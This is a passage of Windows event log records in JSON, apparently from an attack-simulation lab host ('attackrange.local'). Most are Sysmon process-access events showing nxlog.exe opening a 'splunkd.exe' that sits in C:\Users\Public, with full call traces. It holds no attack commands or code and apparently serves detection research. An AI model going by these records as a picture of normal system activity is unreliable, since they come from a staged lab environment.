(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:02.336","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2959,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:03.338\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:03.338","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2960,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:04.340\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:04.340","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2961,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:05.342\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:05.342","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:06","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2962,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:06.344\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:06.344","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:06","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76845,"ProcessID":852,"ThreadID":940,"Channel":"System","Message":"The TrustedInstaller service entered the stopped state.","param1":"TrustedInstaller","param2":"stopped","EventReceivedTime":"2020-08-01 06:51:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:06","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2963,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:06.830\r\nSourceProcessGUID: {E2A3D6B1-1060-5F25-0000-00100B640200}\r\nSourceProcessId: 3012\r\nSourceThreadId: 3028\r\nSourceImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nTargetProcessGUID: {E2A3D6B1-1060-5F25-0000-0010C4650200}\r\nTargetProcessId: 3052\r\nTargetImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\System32\\combase.dll+669f8|C:\\Windows\\servicing\\TrustedInstaller.exe+43a2|C:\\Windows\\servicing\\TrustedInstaller.exe+1d1d|C:\\Windows\\servicing\\TrustedInstaller.exe+28c6|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:06.830","SourceProcessGUID":"{E2A3D6B1-1060-5F25-0000-00100B640200}","SourceProcessId":"3012","SourceThreadId":"3028","SourceImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","TargetProcessGUID":"{E2A3D6B1-1060-5F25-0000-0010C4650200}","TargetProcessId":"3052","TargetImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\System32\\combase.dll+669f8|C:\\Windows\\servicing\\TrustedInstaller.exe+43a2|C:\\Windows\\servicing\\TrustedInstaller.exe+1d1d|C:\\Windows\\servicing\\TrustedInstaller.exe+28c6|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2964,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:07.346\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:07.346","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2965,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:08.348\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 